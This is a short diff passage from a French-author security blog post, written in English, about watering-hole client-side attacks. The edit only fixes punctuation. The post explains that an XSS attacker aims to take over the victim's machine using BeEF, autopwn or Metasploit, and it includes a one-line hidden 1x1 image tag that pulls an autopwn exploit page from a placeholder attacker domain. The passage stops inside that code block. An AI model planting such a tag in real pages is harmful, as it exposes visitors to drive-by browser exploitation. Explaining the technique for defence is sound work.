0x0ff/en.0x0ff.info/_posts/2021-01-21-Client-Side-Attack-Watering-Hole.markdown

 ![alt]({{ site.url }}{{ site.baseurl }}/assets/images/posts_img/XSS_example1.png){: style="margin: 1em"}

-The real attacker objective, being to take control of your station, rather than displaying a message "for the _lolz_" , he will instead try to use a module of his own by exploiting a vulnerability in your browser, or a key exploit.
-Practically talking through **BeEF** , **autopwn** or **metasploit** :
+The real attacker objective, being to take control of your station, rather than displaying a message "for the _lolz_", he will instead try to use a module of his own by exploiting a vulnerability in your browser, or a key exploit.
+Practically talking through **BeEF**, **autopwn** or **metasploit** :

 {% highlight javascript %}
 <img src = "//<pirate_domain>/autopwn" border='0'width='1' height='1'>